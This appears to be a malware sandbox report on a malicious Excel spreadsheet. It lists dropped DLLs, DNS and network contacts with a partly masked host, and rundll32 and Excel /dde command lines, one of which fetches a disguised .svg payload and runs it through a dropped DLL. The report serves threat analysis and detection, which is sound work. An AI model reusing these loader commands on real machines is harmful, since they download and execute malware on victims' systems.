Technical Information
- %TEMP%\~0d38qybzxkf.dll
- <PATH_SAMPLE>.xlsx
- %TEMP%\~ntysngmrdonoprg.dll
- 'sr###r.icp.cool':80
- 'sr###r.icp.cool':55241
- http://sr###r.icp.cool/sgdo/xovqe/bosign.svg
- DNS ASK sr###r.icp.cool
- ClassName: 'XLMAIN' WindowName: 'Microsoft Excel (Product Activation Failed) - Book1'
- ClassName: 'XLMAIN' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\~0D38qYbzxKf.dll,run http://sr###r.icp.cool/sgdo/xovqe/bosign.svg|<Full path to file>|%TEMP%\
- '<SYSTEM32>\rundll32.exe' url.dll,FileProtocolHandler <PATH_SAMPLE>.xlsx
- '<SYSTEM32>\rundll32.exe' %TEMP%\~NTySNgMRDOnoprG.dll,entrypoint
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde